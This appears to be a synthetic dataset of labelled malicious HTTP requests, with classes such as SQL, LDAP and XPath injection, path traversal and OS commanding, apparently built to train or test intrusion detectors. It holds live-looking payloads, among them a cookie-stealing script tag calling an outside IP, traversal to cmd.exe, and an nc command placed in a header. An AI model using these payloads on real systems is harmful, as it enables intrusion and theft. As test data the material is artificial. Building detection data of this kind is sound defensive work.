GET /deish/V0selectTuelikeperlq/tha6gnyrhed9a.cgi?sgoeta=06&NBESN_Jn-u=%3Cimg++src++%3D++%22+++livescript%3A%5Bwindow.open%28%27http%3A%2F%2F86.188.44.229%2Ftero.exe%27%2Bdocument.cookie%29%3B%5D++++++%22+%3E&aoo=549892177 HTTP/1.1
Host: 231.22.166.196
Connection: 5i0bUear
Accept: application/postscript;q=0.3, text/html, audio/*
Accept-Charset: euc-jp, windows-1251, cp-936;q=0.4, hz-gb-2312;q=0.2, windows-1254
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: max-age=954
Client-ip: 118.106.166.150
Cookie: yso8reay=a5TPe
Cookie2: $Version="655"
Date: Sun, 04 Mar 07 16:21:59 UTC
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: ih1treV=Hro8bc;fphyedn=8usRht
From: i5nNat@viikl.cz
If-Modified-Since: Sun, 20 Feb 05 12:55:03 UTC
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: "s7b7MVjb72gaeV.54hD"
If-None-Match: *
If-Range: *
Max-Forwards: 402
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: lttc 1geto=iareHg
Authorization: Basic ZWFmdGFtdDplVGVz
Range: 7-,-18566
Referer: /edejt.mdb
TE: deflate;q=0.6,deflate;q=0.8,deflate;q=0.9
Trailer: If-Match
User-Agent: le8hsuey (rrmq@E)
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: eenbH; ysete=etomFen
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 205 168.163.244.39 "rui0nun" "Thu, 26 Jan 06 03:08:13 CET"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47579
Start - Id: 41128
class: SqlInjection
GET /oeLf7cctmsn7mes/l@k9Brz2H7FfH/thtshEca9a5/Ehqp/D@HCwK/mnE6roHy4hicstb/kXGWW/xtdo/6WIdrH@PZFB8/iwJ8/ayU_VV8Y8.gif?xCshutdowngU_TQGty=nq%29enbwaei+&cuQk.CwMm=bulk++++insert++ahtxpeA++from+++++%27pwdump.exe%27++++++with++%28codepage%3D%27RAW%27+++%29&b3reotisiontri=wasoncshutdowncye%2Bsi&nlpkLoh=l6ku&6a6@RyMpadmin8=dg9&xunniatnivi=Aur&azpraehe=9571&cn2a=n&ndiqetgj2Pi=bBRc&xzpselectl=8369840&Se0dyadaax54eh=0019283 HTTP/1.1
Host: 112.186.107.100
Connection: close
Accept: video/quicktime;q=0.8, video/quicktime;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.7, compress, identity
Accept-Language: *
Cache-Control: tsiec=oRhnmE
Client-ip: 225.169.58.33
Cookie: th=oni2eetPLuolbhar;hotN2o=dE9;ospCoc4=pleedelete:gtSs;oaMyseInsrJ9tit=str0oserbd
Cookie2: $Version="3"
Date: Thu, 07 Sep 06 04:01:01 UTC
ETag: W/"2aTlPu50dA@UKfxeZq"
Expect: raanjDia
If-Modified-Since: Tue, 08 Jan 08 22:48:23 CET
If-Unmodified-Since: Sun, 11 Jan 09 12:01:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 14
Pragma: no-cache
Authorization: kknwh 9eoe8nl=fNaroe
Referer: /vtndt/5upqh.php
Trailer: Accept-Encoding
User-Agent: weedt6zt/2.8.9
UA-CPU: 68000
UA-Disp: 731,4085,32
Via: lan/5.7 5.30.78.209
Transfer-Encoding: deflate
Warning: 817 www.zwnsrtsn.css "3ewnh0esrxhhAt6odael" "Wed, 28 Feb 07 06:00:38 GMT"
X-Forwarded-For: 155.33.177.149
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41128
Start - Id: 37464
class: LdapInjection
GET /h-.hjYBXO0tdiRXsAHp/fHmFIbpeK3X7KyOlki.jsp?idft5ieetramkg=w%3Bs&hota66ySc=+samgroup+bynp&poe=wlechoosaos HTTP/1.0
Host: 184.211.80.189:84262
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1258;q=0.6, iso-8859-4, big5
Accept-Encoding: *;q=0.7
Accept-Language: rt-mvkoyn;q=0.4, ppoHQRi-ec
Cache-Control: no-cache
Client-ip: 97.241.16.223
Cookie: 7@L4TeHm=k;asG;byo=77917609;enchskenucnH=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="30"
Date: Mon, 11 Oct 04 16:17:38 GMT
ETag: W/"V8R_45eWVLFPfXgmsM7e"
Expect: xeilyu=t8r8Bikn;huTb=yonIs
From: N3ngga4t@jimvmunTsn.fr
If-Modified-Since: Tue, 04 Apr 06 12:20:55 GMT
If-Unmodified-Since: Wed, 28 Oct 09 01:08:31 GMT
If-Match: "QQ@QWEeHBYmXPldC3wA"
If-None-Match: *
Max-Forwards: 6
Pragma: no-cache
Authorization: NTLM cGZUZG5teTRtb3JiaDloanRseWV1enc0dm5uOHRzZTB1aWRUZWVu
Range: 3-,5-
Referer: /aao8/nphirsc.asmx
TE: gzip,gzip,trailers
Trailer: If-Range
User-Agent: tanspchszl
UA-CPU: MIPS
UA-OS: Win9x
UA-Pixels: 9871x247
Via: HTTP/9.5 159.13.232.127, 0.3 2.129.36.50
Transfer-Encoding: pieta
Upgrade: vho/1.5, edT5k/9.2, ekS/7.1

null

End - Id: 37464
Start - Id: 35203
class: SqlInjection
GET /ofh@Lqi9UQAiBhhB_z/xegso/UGqUsambZdw/im_H6aGPz/XMGT-/eBkz/iq7eWpkV74-46ThcT/ocnhodiIpu/g01lma.gSfGAdhTf0.php3?tiHln=2dteia&hlqB9NF=%27+OR++%27iws3%27+%3D+%27+&ApvWZ=tnhscsa&7sy0nupaU=230&zeJ5acceptNg9SE1=357153 HTTP/1.1
Host: www.fwnjudr.com
Connection: close
Accept: image/png
Accept-Charset: *;q=0.5
Accept-Encoding: deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=21297
Client-ip: 142.201.79.191
Cookie: qjPdocument=otail;rnnt=smaqise
Cookie2: $Version="796"
Date: Mon, 10 Sep 07 11:33:54 CET
ETag: W/"LM@OO5twrv6vOD3z@"
Expect: 100-continue
From: os33et6k@EniiktZna.uk
If-Modified-Since: Fri, 05 Oct 07 02:49:27 GMT
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "mljvsz-0FOdenSPh"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 5006
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM b3NTZXA0YW5uT3REdXlBYXlvdG90ZTE3OG9tYWhnaWNlc2F3b3R0eXkzaGVyaQ==
Authorization: lnie e8dsIrte=ositt
Range: 786796-,-020
Referer: /nlf6efw.pdf
TE: trailers,trailers
Trailer: If-Match
User-Agent: dthaeUfz
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: identity
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 562 145.202.157.174 "Eninnaeeoatl9O4t" "Mon, 02 Feb 04 01:35:42 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 653794992925901
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35203
Start - Id: 39067
class: LdapInjection
PUT /aoeeigan.jpeg? HTTP/1.0
Content-Length: 114
Content-Language: fnmte0Ko,ni
Content-Encoding: deflate
Content-Location: /eucekcdl.mpeg
Content-MD5: ZXJkdEN1YW5nc282aWVvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Jan 05 20:31:17 GMT
Last-Modified: Wed, 25 Nov 09 05:22:21 GMT
Host: 218.144.119.250
Connection: onboer
Accept: audio/x-wav, video/quicktime, text/plain
Accept-Charset: iso-8859-2;q=0.6, x-mac-ce, windows-1254;q=0.1
Accept-Encoding: compress
Accept-Language: WtCCAs7-dor
Cache-Control: no-store
Client-ip: 239.175.77.189
Cookie: roa=uu)(|   (teaj=*);iwkyeNuefgmoa= 9O;tyO5lroegxQh=664;ilkers=emd;Tn=mtretsservices;dmkrwnTteiawag=[f
Cookie2: $Version="43"
Date: Sun, 21 Jan 07 13:49:37 UTC
ETag: ".0u_z.AlvPuA9LK6LDW"
Expect: hit8O3n=ennhs;srMiqRo=qddrso
From: ct0nt@neotdaE7.cz
If-Modified-Since: Fri, 26 May 06 03:35:28 CET
If-Unmodified-Since: Tue, 26 Jul 05 22:04:41 GMT
If-Match: "g_1ehYSFpaosVvh"
If-None-Match: "iJrLbp3JtD4_1YK"
If-Range: *
Max-Forwards: 338
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="bc4244b1f0ed32c2C5fBb2dF8b3fa903"
Authorization: ssrmue tteeEedH=ieyroaq
Range: 4-036093,-25292
Referer: /eenwso.aspx
TE: gzip,trailers
Trailer: User-Agent
User-Agent: sinesl/1.1
UA-CPU: MIPS
UA-Disp: 7404,0274,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0434x6105
Via: eec/0.6 192.97.196.18, 2.7 www.igailfFw.htm
Transfer-Encoding: deflate
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 543 www.edobgt0.js "lcowdr5ilNc" "Thu, 29 Dec 05 20:06:59 GMT"
X-Serial-Number: 53018392304378
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Eay0taqsisge=744077962&Ah5gwxrh9jhdwr=t(KeE&EAa7pheerest=dX2K&gctr= bmmttelnetrrlugeo5e&TBv@libS5L0@DN=ts2fm8mme

End - Id: 39067
Start - Id: 49902
class: XPathInjection
GET /strmp/9XRt.OgGITcwTujTB/nglieO/eiaqhqg2npi1/hQBhJiXZQvymW1d8wXaH/ceylnf/rwEieullpr5/j3/dJwhDW3.QLJ/KT3MHwU9nullJfYiiunion/tuDwq_0kafnb/XuiNiiRlhryloQkwu.cgi?Hotfo8dnFnoe=58eAreeolfr%7Cnt%40group+bytz+&go3wsRkne=tjieSeosoioh&uo=44137062&4KZc7Zdocument1-scriptep=%28i+%3C+++count%28hemR%2Fchild%3A%3Atext%28%29%29+++and++j+++++%3C+count%28nfe%2Fchild%3A%3Acomment%28%29%29++and+k+%3C+++++count%28ron%2Fchild%3A%3A*%29++++%29&form7NphpwV5=ltwh&3traxjoyl2n=7626699&pgh4isdtiyib=iasdDi4tEquLtaaae&geteei3yjem=6hsimlrhqf&32svzwahcsDae=46037428 HTTP/1.1
Host: 63.223.82.45
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, x-mac-cyrillic, iso-8859-8;q=0.9, x-mac-cyrillic;q=0.0, x-mac-hebrew
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.190.168.5
Cookie: SoutoSehdirgneh= vs;L-FadminOXe=gc(objectcidl;lool=thCby;yy=o3fB;id7w2ONm=40;RrsreEr=sdropseAulsyql
Cookie2: $Version="4"
Date: Thu, 16 Mar 06 09:13:15 UTC
ETag: "J-XfPADekrBOg--rqJ"
Expect: 100-continue
From: t9xyb@dtrmz.gov
If-Modified-Since: Mon, 18 Feb 08 07:35:50 CET
If-Unmodified-Since: Sun, 14 Sep 08 04:41:05 UTC
If-Match: *
If-None-Match: "n0uj1cgdyIb4xo_hZ"
If-Range: *
Max-Forwards: 3
MIME-Version: 6.4
Pragma: neetrl='alonm'
Proxy-Authorization: NTLM T2RhYW5lcnJobG1DcjVhZHJucjdlaGFwaWlzY21vM2V0Z3Ju
Authorization: Basic c0RuZXplbGU6ZWdoYWV5eg==
Range: 794-
Referer: http://www.6ydE.ch/k1eae5eo/t2Tsa.pl
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/1.0 (compatible; Konqueror/9.9; Unix; hruak; ahhhkiy9ie)
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9591x1965
Via: 3.4 www.tEnoaroe.jpg, vmesiW/7.1 10.112.134.134
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 49902
Start - Id: 41334
class: SqlInjection
GET /3BX_lwC36h/3qnh9htoearnwei/mstOdtiesuawh/eir/lek0rsycamqS3rss5nit/eyiroen3rd3exy7hqej/aDW6.dll?lm=657326&tnefeC1dsyo=3721&aoNztnm6ZteeAm=4252447&gpv7wbziQzandq=hi&lepwntRt4atcts=ntt%2BnfbgosNdrg&hj492nSde0o=aDPjnERCKt4&LPgDFcM4-zZ=ipilutnct4Lei3el&f.rEMHowhere-replace=6&onsaitabi6ozo=67169051&d8o2re4oihgpnn=btmpN&4ncEBservices-uI6n=30 HTTP/1.1
Host: www.hams.uk
Connection: ipevi1td
Accept: text/*;q=0.6
Accept-Charset: iso-8859-15
Accept-Encoding: gzip, gzip, identity;q=0.1, compress;q=0.1, gzip
Accept-Language: e3l-lrszmt;q=0.8, i-gaSaucrl;q=0.0
Cache-Control: no-transform
Client-ip: 48.121.113.98
Cookie: On0IG=ceeo;grsalmo7n9m=483272;hssn1evz=;    exec    get_cust(    'x''  union  select  object_name,object_type,''x''   from   user_objects    where     ''CahEso'' =    ''    '    );
Cookie2: $Version="5"
Date: Tue, 08 Nov 05 07:25:51 CET
ETag: "Q02j@jqdQMD-1DX"
Expect: 100-continue
From: 1eqhnuaw@aenh.gov
If-Modified-Since: Sun, 01 May 05 12:33:03 GMT
If-Unmodified-Since: Tue, 05 Dec 06 01:47:39 CET
If-Match: *
If-Range: Sat, 03 Sep 05 24:17:31 GMT
Max-Forwards: 2879
Pragma: no-cache
Authorization: Basic ZXdnbG91OjVQczBod2lm
Range: -21184
Referer: /heaknX8/moan2/uc8sO/obeeiutp/zuortr.exe
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: xteldon (9npun3; e1eu2@F; n2C-m6y59q)
UA-CPU: Sparc
UA-Disp: 5163,6736,32
UA-Color: color16
Via: 5.5 242.27.2.255
Transfer-Encoding: iEwu
Upgrade: ile6/0.0, eje/8.4, niwnj/7.4, nandot/7.9
X-Forwarded-For: 94.165.82.13
X-Serial-Number: 83970486432
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41334
Start - Id: 42740
class: SqlInjection
POST /tSVRkbuwr1.GdY/bsYOncxKu2/dLb/beoftsirelitutc/kZzepaOiyjsPd@8oM/i8tn.htm? HTTP/1.0
Content-Length: 181
Content-Language: e,condy8z
Content-Encoding: deflate
Content-Location: http://omsmpie.biz/yttWt/5iah/iz2aooho/imLto/e5idveue.tiff
Content-MD5: eXpDb3N0bHRvaHRoZXRzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jul 09 02:36:46 CET
Last-Modified: Sat, 17 Apr 10 12:13:14 CET
Host: 246.134.223.170
Connection: lTuSza3
Accept: audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 133.61.102.149
Cookie: zahidhtlw=';  insert   into hcIdtyX values(666,'nh','deoiT',0xfffff)
Cookie2: $Version="108"
Date: Tue, 10 Apr 07 06:48:21 UTC
ETag: "3spb4TK2EuEY@0A"
Expect: 100-continue
From: rlte@rs4T41y.it
If-Modified-Since: Tue, 30 Mar 10 04:07:27 GMT
If-Unmodified-Since: Fri, 01 Jun 07 07:41:41 UTC
If-Match: "2QJtZ65Tso1AA@XJNJdL"
If-None-Match: "LqIwakH4phFYcNfHD"
If-Range: Fri, 25 Mar 05 19:20:30 CET
Max-Forwards: 7
MIME-Version: 2.2
Pragma: i7U='omiew'
Proxy-Authorization: aln6t gslo=lTedse
Authorization: Basic U3N0cnNpOnBzdGJz
Range: 48614-31991
Referer: /raees/rg5tonn/aucehrt/wnedtzy.png
TE: deflate;q=0.3
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.5 (Windows; U; Win 9x 0.6; oa-oi; rv:2.2.0) Gecko/08522660
UA-CPU: MIPS
UA-Disp: 336,722,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 957x8790
Via: HTTP/5.8 7.191.181.40:164, FTP/0.9 169.224.221.59
Transfer-Encoding: compress
Upgrade: usuiD/4.0, 7hqfn/1.3, ua0l/0.7, ndst/6.3
Warning: 353 www.douan.shtml "yoel8er3" 
X-Forwarded-For: 235.103.6.212
X-Serial-Number: 40137446111101
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

h5t=1050&fruRee83=tuB&5vtNB4=tSBet&3t=juopt&UgyeSmfeePwioe2=10582&eNa=ttwusttrstb01resmh&ctkro1=isl&srbSbs1joh=26&ah=tmTlen%otyb53&fsGke=r6Ae&eyi=3045&amdobroennh=jiteycal2rdnzrby

End - Id: 42740
Start - Id: 44344
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.vloldnms.org
Connection: Rmort
Accept: */*;q=0.8
Accept-Charset: x-mac-arabic;q=0.9, x-mac-chinesetrad, x-mac-arabic;q=0.1
Accept-Encoding: 
Accept-Language: hnl-so2;q=0.2, L-roniZl;q=0.1
Cache-Control: no-transform
Client-ip: 231.246.74.85
Cookie: eoencoxteaYre=douj;7ciso9onq73tno=90783647
Cookie2: $Version="89"
Date: Sat, 31 Jan 09 12:37:30 UTC
ETag: "kwXTvO@4m-@MIi_"
Expect: tdto8=mthmsit
From: i8sQi@iAniafshe.it
If-Modified-Since: Thu, 10 Mar 05 21:55:40 UTC
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "0Ed436M-Rj3k1HF1-n"
If-None-Match: "OIYpFEY1Ubpn@6KCyMl"
If-Range: Sat, 13 Mar 10 05:58:32 UTC
Max-Forwards: 81
MIME-Version: 5.3
Pragma: Eiilnn='tisHs'
Proxy-Authorization: Digest nc=e078eCD8
Authorization: a9cb rpta8oc=nteya
Range: 8613-7,823162-28,06138-
Referer: /otfzsicg/doStoe/ptgU0/pciifrts/ha2Datt.js
TE: chunked,gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (compatible; Konqueror/6.0; Linux i386; aogi; oih62a; rsinh)
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 127x111
Via: FTP/3.5 www.nzode.gif, FTP/8.8 6.128.212.140:7478
Transfer-Encoding: identity
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44344
Start - Id: 38990
class: LdapInjection
GET /mxd/tI3bkte81Z6HJj-5./dtiiicaoitoASdo/SyfgliwrE/_N/yI9aM1f/VdKinput_4tVQetcopy/wwbTgnhdYfR/aohhhe/eoho2t61eqnZr.gif?Era95otehXteepn=owgSTo&ng.SFj9=y%3FqRaphps&m2thnolsxh=80&l2f=6875211&ycsuqlv5eeOae=Ruadleosceu&eTmhohc=odta&irhh=%29++++%28+++%7C+%28displayName%3Dhad*%29%28name+++%3D+++had*++%29%28+mail%3Dhad*++%29&tni4snerrts=rrie2ruii HTTP/1.0
Host: 252.218.101.162
Connection: keep-alive
Accept: video/mpeg;q=0.7, image/png
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-age=98
Client-ip: 223.192.79.45
Cookie: nslr=sewt;OEe1Ka6NjyoY=r9sh-e1e';ikctrg8o=18224;deEHoacnsEeioas=25853
Cookie2: $Version="51"
Date: Thu, 08 Oct 09 01:27:10 UTC
ETag: "9iXp@tJghwelCND"
Expect: 100-continue
From: nuirrts@cnoeRGT.ch
If-Modified-Since: Wed, 22 Apr 09 09:08:22 UTC
If-Unmodified-Since: Thu, 01 May 08 24:59:05 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 May 04 10:38:07 UTC
Max-Forwards: 8
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic dlliYjpuaXNk
Authorization: NTLM cmM2RmFwZTF4cGt0c3NFQU9xaVdydGh6T2VhU292cXM=
Range: 2-,-247703
Referer: /hmomndo/ew6d/neAfTea/7iemrTni/Eteaun.cgi
TE: deflate
Trailer: Range
User-Agent: ElbEchht (hD7xs6; 3ueidL; tf1Ay1G; nk9-0l)
UA-CPU: MIPS
UA-OS: Windows 98
UA-Pixels: 8193x847
Via: HTTP/6.7 176.17.248.123, 9.3 www.vbhw.jpeg, 4.4 www.dnsR3he.js
Transfer-Encoding: gzip
Upgrade: ir0/8.9, deh7/6.4
Warning: 690 www.hd6EutI.tiff "hneytet" 
X-Serial-Number: 95673
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38990
Start - Id: 49670
class: XPathInjection
GET /9ql7aqPi8AJtYWE.pl?BCWUeUE=%25uygnes2e+%28A&TScatL=sTb77tg%27+or+++++6+++%3C+++count%28path%2Fchild%3A%3A*%29++or++%27ri%27++%3D+++%27&-vRJ7=gd_&ewm7lse1Ehooote=t&drbCr=dZqxyX3R&ebddloIenjer=no HTTP/1.0
Host: 117.181.0.216
Connection: Ao92a
Accept: application/rtf;q=0.6
Accept-Charset: euc-kr
Accept-Encoding: *
Accept-Language: xode-7eg;q=0.8, erenkh-elMqe, hqyanha-aOheFdie;q=0.5, aonenk7-pchlnfm, hoEoei-aronhj
Cache-Control: min-fresh=27
Client-ip: 74.210.240.133
Cookie: swrtca7Ti=ioiIbw;ilani4tbser4=egWlbAYFnpv;eomwe9u=64
Cookie2: $Version="1"
Date: Fri, 08 Apr 05 01:49:14 UTC
ETag: "-oUkV855XGZ38_U5ND"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Thu, 10 Nov 05 17:37:08 UTC
If-Unmodified-Since: Thu, 08 Jun 06 23:18:44 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Jan 04 15:43:18 UTC
Max-Forwards: 632
MIME-Version: 5.9
Pragma: aS='emEtmhrw'
Proxy-Authorization: Daieeh fnea=l3o3no
Authorization: Basic cW9pb3NzOmVvdW5t
Range: -09
Referer: /0yoeocs4.exe
TE: trailers
Trailer: Range
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 8.0; De-xe; rv:8.7.8) Gecko/64593042
UA-CPU: Sparc
UA-Disp: 014,944,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 491x233
Via: 7.3 www.beosnefe.shtml:962
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
Warning: 044 www.ewuqbi.js "trhiteoe9" 
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 40217863095
----: ------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49670
Start - Id: 48449
class: XPathInjection
GET /5meaUeuo/okfihomrtEegaesedd/rgNhntearh/gtntv/stfnaemsij6e/esjztitoiNirodklh/IB/soWYTJIwllUJYn.css?boIatIi=Hp+a0d&dejcs3mbe=daD4j99p&owhi=4&Docmydgghlsof=aymu&uneati=sOnds52prcxmlfcTCo HTTP/1.0
Host: www.ylfh.cz
Connection: close
Accept: application/*, audio/*;q=0.8, text/plain;q=0.9
Accept-Charset: x-mac-ce
Accept-Encoding: deflate, deflate;q=0.3
Accept-Language: *;q=0.4
Cache-Control: max-age=56
Client-ip: 59.195.168.32
Cookie: namgoseserlipx=277;4iDorscilbuz6e=26227   or m/uccdho/ee/child::node()[position()=367] or 5=;nOCaieheu=ldkezar9ajge
Cookie2: $Version="425"
Date: Tue, 21 Mar 06 01:34:50 GMT
ETag: "wD11v2K1vjaq.FUAN.l"
Expect: 100-continue
From: Lulrt@wdvuoa.de
If-Modified-Since: Thu, 15 Jul 04 17:55:06 GMT
If-Unmodified-Since: Fri, 17 Feb 06 05:22:42 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Mar 09 18:55:19 CET
Max-Forwards: 3
MIME-Version: 2.9
Pragma: afhi9i=eng1dam5
Proxy-Authorization: Tcdn 7efalmwm=stoxcSra
Authorization: Digest username="rspaecf"
Range: 2-,035919-,808526-
Referer: /hwrtoyer/ae8ar/vYzo/lIgA1g.jsp
TE: deflate;q=0.0,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/1.2 (Windows; U; Win98 5.1; ou-dn; rv:5.5.4) Gecko/99076791
UA-Disp: 5360,872,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.5 61.142.72.91:0195
Transfer-Encoding: identity
Upgrade: rtyfAi/5.9
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
X-Serial-Number: 30614
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48449
Start - Id: 44706
class: PathTransversal
POST /BH/l_7133/7ncNeihneaBdSone/SR.exe? HTTP/1.1
Content-Length: 228
Content-Language: tw
Content-Encoding: compress
Content-Location: /uaeno5e/sIeUt/edpeoy/xcst/oyRl.nsf
Content-MD5: ZWViUnkwdGk2YWl5Q2V1bw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Apr 07 05:12:01 UTC
Last-Modified: Sun, 02 Dec 07 04:42:38 GMT
Host: 117.61.215.163
Connection: tsewf0
Accept: image/jpeg;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.0
Accept-Language: sReih-yoacdug4, e-p, umhoger-dpd
Cache-Control: no-store
Client-ip: 159.172.8.1
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="933"
Date: Tue, 01 Dec 09 09:47:41 UTC
ETag: W/"Bh_3j_aMsWXBvzFBVn"
Expect: eopynrn=ccgFnA
From: ohoe@b9a8.de
If-Modified-Since: Fri, 20 Jun 08 24:26:02 CET
If-Unmodified-Since: Thu, 21 Dec 06 02:56:18 GMT
If-Match: *
If-None-Match: "u6ngdBhEDc6rGQf5"
If-Range: Sat, 20 Aug 05 17:34:56 UTC
Max-Forwards: 54
MIME-Version: 8.4
Pragma: oAene=tgi9
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic c2F2bHI6ZWFsbQ==
Range: 8542-,-709
Referer: http://www.9a5ddPi.net/yArE/aTuip.swf
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 7.0; me-od; rv:7.1.9) Gecko/67243093
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: FTP/3.1 www.aNes.tiff, fraa/8.9 178.36.234.229
Transfer-Encoding: identity
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

Cxglike=../../../usr/dsqqdsqsd.xml&57lwo=361082388&styleIE1F=op&ele&wTmyiATcne= z benxhavingdocumentshutdown&eta=scruseusspaml&y4bEe1t4B5rde=3ifa enullb&)etfiEb&hw6yqnulooseprR=8451675&ueC7osyt7egoekh=sanuitoi7tjkl

End - Id: 44706
Start - Id: 42937
class: OsCommanding
GET /e0fkx5/paaho2hvBef/itzc/85-nzbw2LQK_tHt/K2qayitaiiunta/a9/lj/na3.swf?lhgsehem=5286&ucroathfesHn=+aapetmochas%27mt&rRnerky7l=4721223&m9d=2305&owjeAle=e_mjr5%406-uql&oa2wctawoLak=dOGeML.CETP&iks44=aezdMe6ndTiframe&owtpttua=slmlio7es4r&ASLIvG%u=3793977&tlgcitti=efH-zVpj&iiuas0oiyepA=801220157&ePEmiimeY2dria=A&ie6vrcmh=irnCn&xlciftNpgR=0023 HTTP/1.0
Host: 208.119.40.56:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: %0a    nc     www.islaineronol.com     80    ;
Cache-Control: max-age=6774
Client-ip: 226.241.221.163
Cookie: 2w07=5940;nSnhl=fHGuvr
Cookie2: $Version="148"
Date: Mon, 08 Mar 04 20:59:31 UTC
ETag: W/"TPazJN9VkdLe-HTD6v"
Expect: 100-continue
If-Modified-Since: Thu, 25 Jan 07 18:31:13 UTC
If-Unmodified-Since: Thu, 02 Sep 04 14:05:15 GMT
If-Match: *
If-Range: Mon, 17 Oct 05 13:52:05 CET
Max-Forwards: 6
MIME-Version: 6.5
Pragma: no-cache
Authorization: Basic aW5uNzp0VWFzaXFzdA==
Range: 01418-88080,370072-
Referer: /p7nuHm.pdf
TE: deflate
Trailer: Referer
User-Agent: diteeNgrT/2.9
UA-CPU: PowerPC
UA-Disp: 633,7308,8
